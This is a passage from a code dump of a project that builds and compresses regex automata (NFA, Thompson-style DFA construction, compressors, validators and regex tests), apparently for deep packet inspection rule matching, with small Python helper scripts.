edges = new HashMap<>();\n nodes.forEach(node -> {\n node.getEdges().forEach((c, target) -> {\n Pair<Integer, Integer> pair = new Pair<>(map.get(node), map.get(target));\n 
edges.putIfAbsent(pair, new ArrayList<>());\n if (mode == PrintingMode.VISUALISE) {\n edges.get(pair).add(\"\" + (c == 256 ? '$' : (c == 257 ? '^' : c)));\n } else {\n edges.get(pair).add(Integer.toString(c));\n }\n });\n if (node.isTerminal()) {\n String termStr = node.getTerminal().stream()\n .map(Object::toString)\n .collect(Collectors.joining(\" \"));\n// System.out.println(map.get(node) + \" \" + termStr);\n out.append(map.get(node)).append(\" \").append(termStr).append(\"\\n\");\n }\n// if (node.isTerminal()) {\n// System.out.print(\"T \");\n// }\n// System.out.println(node.hashCode() + \" \" + map.get(node));\n });\n edges.forEach((pair, chars) -> {\n String edgeName;\n if (mode == PrintingMode.VISUALISE) {\n if (chars.size() > 95) {\n edgeName = \"r\" + chars.size();\n } else {\n StringBuilder sb = new StringBuilder();\n chars.forEach(sb::append);\n edgeName = sb.toString();\n }\n// System.out.println(pair.getFirst() + \" \" + pair.getSecond() + \" \" + edgeName);\n out.append(pair.getFirst()).append(\" \").append(pair.getSecond()).append(\" \").append(edgeName).append(\"\\n\");\n } else {\n String s = String.join(\" \", chars);\n// System.out.println(pair.getFirst() + \" \" + pair.getSecond() + \" \" + s);\n out.append(pair.getFirst()).append(\" \").append(pair.getSecond()).append(\" \").append(s).append(\"\\n\");\n }\n });\n if (mode == PrintingMode.VISUALISE) {\n System.out.print(out.toString());\n return null;\n }\n return out.toString();\n }\n\n public void close() {\n allNodes().stream().filter(Node::isTerminal).forEach(terminal -> {\n if (!terminal.getEdges().isEmpty()) {\n if (terminal.getEdges().values().stream().anyMatch(target -> target != terminal) ||\n terminal.getEdges().size() != Transitions.MAX_CHAR + 1) {\n throw new AlgoException(\"Cannot close terminal with edges\");\n }\n }\n if (terminal.getTerminal().size() > 1) {\n throw new AlgoException(\"Cannot close multi-terminal\");\n }\n HashMap<Character, Node> mp = new HashMap<>();\n for (char c = 0; c <= Transitions.MAX_CHAR; c++) {\n mp.put(c, terminal);\n }\n terminal.setEdges(mp);\n });\n }\n\n public void setStart(Node start) {\n this.start = start;\n }\n\n public static Dfa parseDfa(BufferedReader reader) {\n return parseDfa(reader, ParsingMode.LETTERS_LIST);\n }\n\n public static Dfa parseDfa(BufferedReader reader, ParsingMode mode) {\n return parseDfa(reader.lines().toArray(String[]::new), mode);\n }\n\n public static Dfa parseDfa(String s) {\n return parseDfa(s.split(\"\\n\"), ParsingMode.LETTERS_LIST);\n }\n\n public static Dfa parseDfa(String[] lines, ParsingMode mode) {\n String[][] dataLines;\n int totalLines = lines.length;\n while (lines[totalLines - 1].equals(\"\")) {\n totalLines--;\n }\n if (!lines[0].equals(\"Graph:\")) {\n dataLines = new String[totalLines][0];\n for (int i = 0; i < totalLines; i++) {\n dataLines[i] = lines[i].split(\" \");\n }\n } else {\n dataLines = new String[totalLines - 1][0];\n for (int i = 0; i < totalLines - 1; i++) {\n dataLines[i] = lines[i + 1].split(\" \");\n }\n }\n HashMap<Integer, List<Pair<Character, Integer>>> mp = new HashMap<>();\n\n int i = 0;\n Integer start = null;\n if (dataLines[0][0].equals(\"s\")) {\n start = Integer.parseInt(dataLines[0][1]);\n i++;\n }\n Map<Integer, Integer> terminalIds = new HashMap<>();\n while (dataLines[i].length == 2) {\n terminalIds.put(Integer.parseInt(dataLines[i][0]), Integer.parseInt(dataLines[i][1]));\n i++;\n }\n for (; i < dataLines.length; i++) {\n String[] dataLine = dataLines[i];\n int a = 
Integer.parseInt(dataLine[0]);\n int b = Integer.parseInt(dataLine[1]);\n mp.putIfAbsent(a, new ArrayList<>());\n if (mode == ParsingMode.LETTERS_LIST) {\n for (char c : dataLine[2].toCharArray()) {\n assert c < Transitions.MAX_CHAR : \"\" + c;\n mp.get(a).add(new Pair<>(c, b));\n }\n } else {\n for (int j = 2; j < dataLine.length; j++) {\n mp.get(a).add(new Pair<>((char) Integer.parseInt(dataLine[j]), b));\n }\n }\n }\n ArrayList<Node> nodes = new ArrayList<>();\n int size = Integer.max(\n mp.keySet().stream()\n .reduce(Integer::max)\n .orElse(0),\n mp.values().stream()\n .flatMap(Collection::stream)\n .map(Pair::getSecond)\n .reduce(Integer::max)\n .orElse(0)) + 1;\n for (int j = 0; j < size; j++) {\n nodes.add(new Node());\n }\n mp.forEach((a, b) -> {\n b.forEach(edge -> {\n nodes.get(a).addEdge(edge.getFirst(), nodes.get(edge.getSecond()));\n });\n });\n\n terminalIds.forEach((id, terminal) -> {\n nodes.get(id).setTerminal(Collections.singletonList(terminal));\n });\n\n\n return new Dfa(nodes.get(start == null ? 0 : start));\n }\n}"
},
{
"alpha_fraction": 0.5343347787857056,
"alphanum_fraction": 0.553648054599762,
"avg_line_length": 28.125,
"blob_id": "bf8f6d83138fc70be3ca4978feec294b382ee75e",
"content_id": "870f42b26c48fe786af4b60d92520706032dbbf4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1398,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 48,
"path": "/src/test/java/NfaTests.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "import automaton.nfa.Nfa;\nimport main.Main;\nimport org.junit.Test;\nimport util.MyList;\n\nimport java.util.List;\n\nimport static org.junit.Assert.*;\n\npublic class NfaTests {\n private void testRegex(String regex, List<String> accepted, List<String> rejected) {\n Nfa nfa = Main.buildNfa(regex);\n for (String string: accepted) {\n assertTrue(nfa.test(string));\n }\n for (String string: rejected) {\n assertFalse(nfa.test(string));\n }\n }\n\n @Test\n public void testRepeated1() {\n String rule = \"/^a{1,3}/Hsmi\";\n List<String> accepted = MyList.of(\"a\", \"aa\", \"aaa\");\n List<String> rejected = MyList.of(\"\", \"aaaa\", \"b\");\n testRegex(rule, accepted, rejected);\n }\n\n @Test\n public void\n testRepeated2() {\n String rule = \"/^a{1,3}b{0,2}/Hsmi\";\n List<String> accepted = MyList.of(\"a\", \"aa\", \"aaa\", \"ab\", \"abb\", \"aaabb\");\n List<String> rejected = MyList.of(\"\", \"aaaa\", \"b\", \"bb\", \"baaa\", \"ba\", \"abbb\");\n testRegex(rule, accepted, rejected);\n }\n\n @Test\n public void\n testRepeated3() {\n String rule = \"/^\\\\w{0,1}\\\\d{0,2}/Hsmi\";\n List<String> accepted = MyList.of(\"\", \"a\", \"x\", \"a5\", \"b64\", \"44\", \"1\");\n List<String> rejected = MyList.of(\"aa2\", \"aa\", \"a345\", \"aaa\", \"42a\", \"3a\", \"a4a\");\n testRegex(rule, accepted, rejected);\n }\n\n// test\n}\n"
},
{
"alpha_fraction": 0.5816993713378906,
"alphanum_fraction": 0.5816993713378906,
"avg_line_length": 23.340909957885742,
"blob_id": "b39d209e0ca2808231d8c8377b6cac3881678f8c",
"content_id": "3a8b64c4caa9c4b96f9017b4760e319ad8002ea7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1071,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 44,
"path": "/src/main/java/automaton/transition/RangeTransition.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package automaton.transition;\n\nimport parsing.ParsingError;\n\nimport java.util.ArrayList;\nimport java.util.Collection;\nimport java.util.List;\n\nimport static util.Utils.parseChar;\n\npublic class RangeTransition extends AbstractTransition {\n final private char l, r;\n\n public RangeTransition(char l, char r) {\n if (r > Transitions.MAX_CHAR) {\n throw new ParsingError(\"r > MAX_CHAR\");\n }\n if (l > r) {\n throw new ParsingError(\"l > r\");\n }\n this.l = l;\n this.r = r;\n }\n\n public RangeTransition(String l, String r) {\n this(parseChar(l), parseChar(r));\n assert parseChar(l) < Transitions.MAX_CHAR;\n assert parseChar(r) < Transitions.MAX_CHAR;\n }\n\n @Override\n public boolean testImpl(Character c) {\n return c >= l && c <= r;\n }\n\n @Override\n public Collection<Character> getAccepted() {\n List<Character> list = new ArrayList<>(); // TODO: HashSet?\n for (char c = l; c <= r; c++) {\n list.add(c);\n }\n return list;\n }\n}\n"
},
{
"alpha_fraction": 0.435988187789917,
"alphanum_fraction": 0.4436578154563904,
"avg_line_length": 22.8873233795166,
"blob_id": "b88aa1d531e942e629c70cfd4f18da89bc3a5beb",
"content_id": "ce283801fccdab5b3026ac4ea63796970f5a6d32",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1695,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 71,
"path": "/pythonTests/python_refactor.py",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "import re\nfrom python_tests import tests\n\n\nHEADER = \"\"\"package generated.python;\nimport templates.RegexTest;\n\npublic class PythonTestset {\n public static RegexTest[] allTests = {\n\"\"\"\n\nEND = \"\"\" };\n}\n\"\"\"\n\nTEST_TEMPLATE = \"\"\" new PythonTest(\"{}\", \"{}\", \"{}\", {}),\n\"\"\"\n\nbanned = [\n (r'\"(?:\\\\\"|[^\"])*?\"', r'\"\\\"\"'),\n (r'\\t\\n\\v\\r\\f\\a', '\\t\\n\\v\\r\\f\\a'),\n ('\\t\\n\\v\\r\\f\\a', '\\t\\n\\v\\r\\f\\a'),\n (r'\\x00f', '\\017')\n]\n\nbanned_words = [\n '\\\\b', '\\\\B',\n '(?P', '(?!',\n '(?=', '(?<',\n '(?#', '(?:'\n]\n\n\nwith open('./../src/test/java/generated/python/PythonTestset.java', \"w\") as result:\n result.write(HEADER)\n for i, (regex, string, verdict, *b) in enumerate(tests):\n try:\n num_backref_re = re.compile(r'\\\\\\d+')\n if num_backref_re.search(regex) is not None:\n continue\n\n found = False\n for word in banned_words:\n if word in regex:\n found = True\n break\n if found:\n continue\n\n if (regex, string) in banned:\n continue\n\n mode = \"\"\n\n rule = repr(regex)[1:-1]\n if rule.startswith('(?i)'):\n rule = rule[4:]\n mode = \"i\"\n\n rule = '/' + rule + '/' + mode\n\n# hex_re = re.compile(r'\\\\x[0-9a-hA-H]{2}?')\n# matches = hex_re.findall(regex)\n# for match in matches:\n# regex.replace\n\n result.write(' new RegexTest(\"#{}\", \"{}\", \"{}\", {}),\\n'.format(i, rule, repr(string)[1:-1], verdict))\n except UnicodeEncodeError as e:\n print(e, string)\n\n result.write(END)"
},
{
"alpha_fraction": 0.6160287261009216,
"alphanum_fraction": 0.6160287261009216,
"avg_line_length": 25.125,
"blob_id": "df83c9743665ea093db830567cc0c6d10ab11a68",
"content_id": "56ba5c660f603e81ace9405d74c26dd37b6bc8ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 836,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 32,
"path": "/src/main/java/automaton/transition/UnionTransition.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package automaton.transition;\n\nimport java.util.Collection;\nimport java.util.HashSet;\nimport java.util.stream.Collectors;\nimport java.util.stream.Stream;\n\npublic class UnionTransition extends AbstractTransition {\n final private Transition a, b;\n private Collection<Character> accepted;\n\n public UnionTransition(Transition a, Transition b) {\n this.a = a;\n this.b = b;\n }\n\n @Override\n public boolean testImpl(Character c) {\n return a.test(c) | b.test(c);\n }\n\n @Override\n public Collection<Character> getAccepted() {\n if (accepted == null) {\n accepted = Stream.concat(\n a.getAccepted().stream(),\n b.getAccepted().stream())\n .collect(Collectors.toCollection(HashSet::new));\n }\n return accepted;\n }\n}\n"
},
{
"alpha_fraction": 0.48854580521583557,
"alphanum_fraction": 0.4905378520488739,
"avg_line_length": 40.83333206176758,
"blob_id": "f30b32777b60303384031119539f9a1ca5c140c0",
"content_id": "e47efce609c2e6d37db0516df5980d36debd5cc5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 4016,
"license_type": "no_license",
"max_line_length": 178,
"num_lines": 96,
"path": "/src/main/java/automaton/algo/thompson/ThompsonModifiedDfs.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package automaton.algo.thompson;\n\nimport automaton.algo.AlgoException;\nimport automaton.dfa.Dfa;\nimport automaton.dfa.Node;\nimport automaton.nfa.Nfa;\nimport automaton.nfa.State;\nimport automaton.transition.EpsilonTransition;\nimport automaton.transition.Transitions;\nimport util.Pair;\n\nimport java.util.*;\nimport java.util.stream.Collectors;\n\npublic class ThompsonModifiedDfs {\n private final Stack<List<Set<State>>> queue = new Stack<>();\n private final HashMap<List<Set<State>>, Node> bijection = new HashMap<>();\n private ArrayList<Node> finals;\n\n public Node createNode(List<Set<State>> states) {\n Node node = new Node();\n bijection.put(states, node);\n queue.add(states);\n return node;\n }\n\n public Dfa run(List<Nfa> nfas) {\n finals = new ArrayList<>();\n for (int i = 0; i < nfas.size(); i++) {\n finals.add(null);\n }\n List<Set<State>> startSets = nfas.parallelStream()\n .map(Nfa::getStart)\n .map(state -> State.traverseEpsilonsSafe(Collections.singletonList(state)))\n .collect(Collectors.toList());\n\n Node newStart = createNode(startSets);\n\n while (!queue.isEmpty()) {\n List<Set<State>> statesList = queue.pop();\n Node curNode = bijection.get(statesList);\n for (char c = 0; c <= Transitions.MAX_CHAR; c++) {\n List<Set<State>> newStatesList = new ArrayList<>();\n for (int i = 0; i < nfas.size(); i++) {\n Set<State> states = statesList.get(i);\n char finalC = c;\n Set<State> newStates = states.parallelStream()\n .flatMap(state -> state.getEdges().stream())\n .filter(edgePair -> !(edgePair.getFirst() instanceof EpsilonTransition) &&\n edgePair.getFirst().test(finalC))\n .map(Pair::getSecond)\n .collect(Collectors.toSet());\n newStatesList.add(newStates);\n }\n List<Integer> nonEmptySets = new ArrayList<>();\n for (int i = 0; i < nfas.size(); i++) {\n if (!newStatesList.get(i).isEmpty()) {\n nonEmptySets.add(i);\n }\n }\n\n if (nonEmptySets.size() > 1) {\n newStatesList = newStatesList.parallelStream()\n .map(State::traverseEpsilonsSafe)\n .collect(Collectors.toList());\n for (int i = 0; i < newStatesList.size(); i++) {\n Set<State> states = newStatesList.get(i);\n int finalI = i;\n states.forEach(state -> {\n if (state.isTerminal()) {\n throw new AlgoException(\"Found terminal state which belongs to more than one Nfa: \" + nonEmptySets.stream() + \" terminal:\" + state.getTerminal());\n }\n });\n }\n Node newNode;\n if (!bijection.containsKey(newStatesList)) { // TODO: empty newStates\n newNode = createNode(newStatesList);\n } else {\n newNode = bijection.get(newStatesList);\n }\n curNode.addEdge(c, newNode);\n } else if (nonEmptySets.size() == 1) {\n int index = nonEmptySets.get(0);\n Node newNode = finals.get(index);\n if (newNode == null) {\n newNode = new Node();\n finals.set(index, newNode);\n }\n newNode.setTerminal(Collections.singletonList(index));\n curNode.addEdge(c, newNode);\n }\n }\n }\n return new Dfa(newStart);\n }\n}\n"
},
{
"alpha_fraction": 0.6159150004386902,
"alphanum_fraction": 0.6244875192642212,
"avg_line_length": 39.345863342285156,
"blob_id": "eefff5e259d8f99c55eddcf2c2256c03a1a8d573",
"content_id": "62ce3ca0e99970f2170ddd7c60c4b67afef5014b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 5366,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 133,
"path": "/src/main/java/main/debug/RecursiveValidate.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package main.debug;\n\nimport automaton.algo.compressor.recursive.RecursiveCompressorMinRootDist;\nimport automaton.algo.compressor.recursive.RecursiveCompressorStatic;\nimport automaton.algo.compressor.validator.HeuristicValidator;\nimport automaton.algo.compressor.validator.MergePairValidator;\nimport automaton.algo.compressor.validator.RecursiveStaticValidator;\nimport automaton.algo.thompson.ThompsonModified;\nimport automaton.dfa.Dfa;\nimport automaton.nfa.Nfa;\nimport main.Main;\nimport main.io.Input;\nimport util.Utils;\n\nimport java.io.IOException;\nimport java.nio.file.Files;\nimport java.nio.file.Path;\nimport java.nio.file.Paths;\nimport java.util.List;\nimport java.util.stream.Collectors;\n\nimport static main.Main.compress;\n\npublic class RecursiveValidate {\n public static void main(String[] args) throws IOException {\n// for (int i = 0; i < 10; )\n Path path = Paths.get(\"./output/graph/validation\");\n// Files.list(path)\n// .sorted()\n// .map(p -> p.resolve(\"./heuristic_recursive.txt\").toString())\n// .map(Input::readSerialized)\n// .forEachOrdered(dfa -> RecursiveValidate.validate2(dfa, \"HTR\"));\n//\n// Files.list(path)\n// .sorted()\n// .map(p -> p.resolve(\"./recursive.txt\").toString())\n// .map(Input::readSerialized)\n// .forEachOrdered(dfa -> RecursiveValidate.validate2(dfa, \"REC\"));\n\n// Files.list(path)\n// .sorted()\n// .map(p -> p.resolve(\"./heuristic.txt\").toString())\n// .map(Input::readSerialized)\n// .forEachOrdered(dfa -> RecursiveValidate.heuristic2validate(dfa, \"HEU\"));\n\n Files.list(path)\n .sorted()\n .map(p -> p.resolve(\"./modified.txt\").toString())\n .map(Input::readSerialized)\n .forEachOrdered(RecursiveValidate::minRootHeuristic);\n\n\n\n// List<List<String>> groupRules = Input.readGroups(Static.FILTERED, Static.TOP_10_GROUPS);\n// for (List<String> group : groupRules) {\n// processGroup(group);\n// }\n }\n\n private static int groupId = 0;\n\n public static void validate1(List<String> rules) {\n groupId++;\n System.out.println(\"Group #\" + groupId + \" with \" + rules.size() + \" rules\");\n\n List<Nfa> nfas = rules.parallelStream()\n .map(Main::buildNfa)\n .collect(Collectors.toList());\n for (int i = 0; i < nfas.size(); i++) {\n nfas.get(i).close(i);\n }\n\n Dfa dfaHeuristic = new ThompsonModified().run(nfas);\n System.out.println(\"ThompsonModified: \" + dfaHeuristic.nodesCount());\n Utils.writeTo(\"./output/graph/validation/g\" + groupId + \"/modified.txt\", dfaHeuristic.print(Dfa.PrintingMode.SERIALIZE));\n\n compress(dfaHeuristic);\n System.out.println(\"ThompsonModifiedHeuristic: \" + dfaHeuristic.nodesCount());\n Utils.writeTo(\"./output/graph/validation/g\" + groupId + \"/heuristic.txt\", dfaHeuristic.print(Dfa.PrintingMode.SERIALIZE));\n\n new RecursiveCompressorStatic().compress(dfaHeuristic);\n System.out.println(\"HeuristicThenRecursive: \" + dfaHeuristic.nodesCount());\n Utils.writeTo(\"./output/graph/validation/g\" + groupId + \"/heuristic_recursive.txt\", dfaHeuristic.print(Dfa.PrintingMode.SERIALIZE));\n\n boolean test1_1 = new HeuristicValidator().test(dfaHeuristic);\n assert test1_1;\n System.out.println(\"(1) HTR: \" + (test1_1 ? \"ok\" : \"failed\"));\n boolean test2_1 = new RecursiveStaticValidator().test(dfaHeuristic);\n assert test2_1;\n System.out.println(\"(2) HTR: \" + (test2_1 ? 
\"ok\" : \"failed\"));\n\n// new RecursiveCompressorStatic().compress(dfaHeuristic);\n\n Dfa dfaRecursive = new ThompsonModified().run(nfas);\n new RecursiveCompressorStatic().compress(dfaRecursive);\n System.out.println(\"ThompsonModifiedRecursive: \" + dfaRecursive.nodesCount());\n Utils.writeTo(\"./output/graph/validation/g\" + groupId + \"/recursive.txt\", dfaHeuristic.print(Dfa.PrintingMode.SERIALIZE));\n\n boolean test1_2 = new HeuristicValidator().test(dfaRecursive);\n assert test1_2;\n System.out.println(\"(1) TMR: \" + (test1_2 ? \"ok\" : \"failed\"));\n boolean test2_2 = new RecursiveStaticValidator().test(dfaHeuristic);\n assert test2_2;\n System.out.println(\"(2) TMR: \" + (test2_2 ? \"ok\" : \"failed\"));\n\n\n// modifiedMinCopy.print();\n\n System.out.println();\n System.out.flush();\n }\n\n public static void validate2(Dfa dfa, String name) {\n boolean test3 = new MergePairValidator().test(dfa);\n assert test3;\n System.out.println(\"(3) \" + name + \": \" + (test3 ? \"ok\" : \"failed\"));\n }\n\n public static void heuristic2validate(Dfa dfa, String name) {\n int x = dfa.nodesCount();\n compress(dfa);\n boolean success = dfa.nodesCount() == x;\n assert success;\n System.out.println(\"(4) \" + name + \": \" + (success ? \"ok\" : \"failed\"));\n }\n\n private static void minRootHeuristic(Dfa dfa) {\n groupId++;\n System.out.println(\"Group #\" + groupId + \" with \" + dfa.nodesCount() + \" nodes\");\n new RecursiveCompressorMinRootDist().compress(dfa);\n System.out.println(\"MinRootDist: \" + dfa.nodesCount());\n }\n}\n"
},
{
"alpha_fraction": 0.4785875380039215,
"alphanum_fraction": 0.4808414578437805,
"avg_line_length": 29.953489303588867,
"blob_id": "179763734f8452bf69da886d7695f75f2307f98f",
"content_id": "901575154461848951aef8022bdb6b3ac762c603",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1331,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 43,
"path": "/src/main/java/main/debug/RecursiveStress.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package main.debug;\n\nimport automaton.algo.compressor.heuristic.DfaCompressor;\nimport automaton.dfa.Dfa;\nimport automaton.dfa.DfaGenerator;\n\npublic class RecursiveStress {\n public static void main(String[] args) {\n DfaGenerator generator = new DfaGenerator(132L);\n// while (true) {\n// Dfa dfa = generator.generateNext();\n// try {\n// System.out.println(\"===\");\n// dfa.print();\n// new RecursiveCompressorStatic().compress(dfa);\n//\n// int sz = dfa.nodesCount();\n// Main.compress(dfa);\n// assert sz == dfa.nodesCount() : sz + \" \" + dfa.nodesCount();\n// } catch (AssertionError e) {\n// e.printStackTrace();\n// return;\n// }\n// }\n\n\n while (true) {\n Dfa dfa = generator.generateNext();\n try {\n System.out.println(\"===\");\n dfa.print();\n new DfaCompressor().compress(dfa);\n\n int sz = dfa.nodesCount();\n new DfaCompressor().compress(dfa);\n assert sz == dfa.nodesCount() : sz + \" \" + dfa.nodesCount();\n } catch (AssertionError e) {\n e.printStackTrace();\n return;\n }\n }\n }\n}\n"
},
{
"alpha_fraction": 0.6587395668029785,
"alphanum_fraction": 0.6694411635398865,
"avg_line_length": 41.099998474121094,
"blob_id": "d10073ae8b792b66ef8058e89d99a28940c64875",
"content_id": "d8fabf7a072cba2397a4a5e6653b4e34478bdc07",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 841,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 20,
"path": "/py_util/process_top10.py",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "## 1\nimport pandas as pd\n\n# df = pd.read_csv('./data/refined/top10.csv')\ndf = pd.read_csv('./data/refined/top10recursive.csv')\ndf = df.iloc[range(10),:]\ndf['Best'] = df[['Recursive', 'Recursive2', 'HeuristicThenRecursive', 'MinRootDist', 'MaxRootDist']].min(axis=1)\nprint(df)\nprint('Total rules: {}'.format(df['size'].sum()))\nprint('Sum of Minimized: {}'.format(df['Minimized'].sum()))\nprint('Sum of ThompsonModified: {}'.format(df['ThompsonModified'].sum()))\nprint('Sum of Heuristic: {}'.format(df['Heuristic'].sum()))\nprint('Sum of HeuristicThenRecursive: {}'.format(df['HeuristicThenRecursive'].sum()))\nprint('Sum of Recursive: {}'.format(df['Recursive'].sum()))\nprint('Sum of Sum-of-single: {}'.format(df['Sum_of_single'].sum()))\nprint('Sum of Best: {}'.format(df['Best'].sum()))\n\nprint(df[['Heuristic', 'ChromaticNumberSimple']])\n\n## ds"
},
{
"alpha_fraction": 0.5294498205184937,
"alphanum_fraction": 0.5333333611488342,
"avg_line_length": 31.733051300048828,
"blob_id": "2318c0757dd201069861f98f83445b9c3b9bf586",
"content_id": "f5a1929a955f951d61bd8816eb6bcf3cdc51217c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 7725,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 236,
"path": "/src/main/java/automaton/nfa/Nfa.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package automaton.nfa;\n\nimport automaton.transition.*;\nimport util.MyList;\nimport util.Pair;\n\nimport java.util.*;\nimport java.util.stream.Collectors;\n\npublic class Nfa {\n private State start;\n private List<State> terminals;\n\n public Nfa(boolean isTerminal) {\n start = new State();\n terminals = new ArrayList<>(4);\n if (isTerminal) {\n terminals.add(start);\n }\n }\n\n public Nfa(State start, List<State> terminals) {\n this.start = start;\n this.terminals = terminals;\n }\n\n public Nfa(Transition t) {\n terminals = new ArrayList<>(4);\n start = new State();\n State fin = new State();\n start.addEdge(t, fin);\n terminals.add(fin);\n }\n\n public void append(Nfa other) {\n if (this == other) {\n throw new IllegalArgumentException(\"Cannot connect nfa with itself\");\n }\n for (State terminal : terminals) {\n terminal.addEdge(new EpsilonTransition(), other.start);\n }\n terminals = other.terminals;\n }\n\n public static Nfa concat(Collection<Nfa> items) {\n Nfa result = new Nfa(true);\n for (Nfa nfa : items) {\n result.append(nfa);\n }\n return result;\n }\n\n public static Nfa union(Collection<Nfa> other) {\n State newStart = new State();\n State newTerminal = new State();\n other.forEach(nfa -> newStart.addEdge(EpsilonTransition.epsilonTransition, nfa.start));\n other.forEach(nfa ->\n nfa.terminals.forEach(terminal ->\n terminal.addEdge(EpsilonTransition.epsilonTransition, newTerminal)\n )\n );\n return new Nfa(newStart, Collections.singletonList(newTerminal));\n }\n\n public void closure() {\n State newStart = new State();\n State newTerminal = new State();\n newStart.addEdge(new EpsilonTransition(), start);\n start.addEdge(new EpsilonTransition(), newTerminal);\n terminals.forEach(terminal -> terminal.addEdge(EpsilonTransition.epsilonTransition, newTerminal));\n newTerminal.addEdge(new EpsilonTransition(), newStart);\n start = newStart;\n terminals = Collections.singletonList(newTerminal);\n }\n\n public Nfa copy() {\n Map<State, State> bijection = new HashMap<>();\n Queue<State> queue = new ArrayDeque<>();\n queue.add(start);\n State newStart = new State();\n bijection.put(start, newStart);\n while (queue.size() > 0) {\n State cur = queue.poll();\n State newCur = bijection.get(cur);\n for (Pair<Transition, State> edge : cur.getEdges()) {\n State target = edge.getSecond();\n State newTarget;\n if (bijection.containsKey(target)) {\n newTarget = bijection.get(target);\n } else {\n newTarget = new State();\n bijection.put(target, newTarget);\n queue.add(target);\n }\n newCur.addEdge(edge.getFirst(), newTarget);\n }\n }\n List<State> newTerminals = terminals.stream().map(bijection::get).collect(Collectors.toList());\n return new Nfa(newStart, newTerminals);\n }\n\n public void makeOptional() {\n terminals.forEach(terminal -> start.addEdge(EpsilonTransition.epsilonTransition, terminal));\n }\n\n public Nfa buildRepeated(int times) {\n Nfa cur = new Nfa(true);\n for (int i = 0; i < times; i++) {\n Nfa next = this.copy();\n cur.append(next);\n }\n\n return cur;\n }\n\n public State getStart() {\n return start;\n }\n\n public List<State> getTerminals() {\n return terminals;\n }\n\n public boolean test(String s) {\n return testHeader(s, true);\n }\n\n public boolean testHeader(String s, boolean addHeader) {\n if (addHeader) {\n s = (char) 257 + s + (char) 256;\n }\n // TODO: better solution\n boolean success = false;\n\n Set<State> states = new HashSet<>();\n states.add(start);\n\n Queue<State> checkEpsilons = new ArrayDeque<>(states);\n State.traverseEpsilons(checkEpsilons, 
states);\n success |= states.stream().anyMatch(State::isTerminal);\n\n for (int i = 0; !success && i < s.length(); i++) {\n HashSet<State> newStates = new HashSet<>();\n\n for (State state : states) {\n for (Pair<Transition, State> edge : state.getEdges()) {\n Transition transition = edge.getFirst();\n State target = edge.getSecond();\n if (!(transition instanceof EpsilonTransition) &&\n !newStates.contains(target) &&\n transition.test(s.charAt(i))) {\n newStates.add(target);\n }\n }\n }\n\n checkEpsilons = new ArrayDeque<>(newStates);\n State.traverseEpsilons(checkEpsilons, newStates);\n\n states = newStates;\n success |= states.stream().anyMatch(State::isTerminal);\n }\n// return terminals.stream().anyMatch(states::contains);\n if (!success && s.length() > 0) {\n return testHeader(s.substring(1), false);\n }\n return success;\n }\n\n public void close(int id) {\n terminals.forEach(terminal -> terminal.setTerminal(id));\n }\n\n public void close() {\n close(1);\n }\n\n public void setupTail() {\n State fin = new State();\n fin.addEdge(new RangeTransition((char) 0, Transitions.MAX_CHAR), fin);\n fin.setTerminal(0);\n Nfa finNfa = new Nfa(fin, MyList.of(fin));\n append(finNfa);\n }\n\n public static Nfa parseNfa(String s) {\n String[] lines = s.split(\"\\n\");\n String[][] dataLines = new String[lines.length][0];\n for (int i = 0; i < lines.length; i++) {\n dataLines[i] = lines[i].split(\" \");\n }\n HashMap<Integer, List<Pair<Character, Integer>>> mp = new HashMap<>();\n\n int i = 0;\n List<Integer> terminalIds = new ArrayList<>();\n while (dataLines[i].length == 1) {\n terminalIds.add(Integer.parseInt(dataLines[i][0]));\n i++;\n }\n for (; i < dataLines.length; i++) {\n String line = lines[i];\n String[] dataLine = line.split(\" \");\n int a = Integer.parseInt(dataLine[0]);\n int b = Integer.parseInt(dataLine[1]);\n mp.putIfAbsent(a, new ArrayList<>());\n for (char c : dataLine[2].toCharArray()) {\n assert c < Transitions.MAX_CHAR : \"\" + c;\n mp.get(a).add(new Pair<>(c, b));\n }\n }\n ArrayList<State> states = new ArrayList<>();\n int size = Integer.max(\n mp.keySet().stream()\n .reduce(Integer::max)\n .orElse(0),\n mp.values().stream()\n .flatMap(Collection::stream)\n .map(Pair::getSecond)\n .reduce(Integer::max)\n .orElse(0)) + 1;\n for (int j = 0; j < size; j++) {\n states.add(new State());\n }\n mp.forEach((a, b) -> {\n b.forEach(edge -> {\n states.get(a).addEdge(new SingleElementTransition(edge.getFirst()), states.get(edge.getSecond()));\n });\n });\n\n for (int id : terminalIds) {\n states.get(id).setTerminal(1);\n }\n\n return new Nfa(states.get(0), terminalIds.stream().map(states::get).collect(Collectors.toList()));\n }\n}\n"
},
{
"alpha_fraction": 0.6764705777168274,
"alphanum_fraction": 0.6960784196853638,
"avg_line_length": 33,
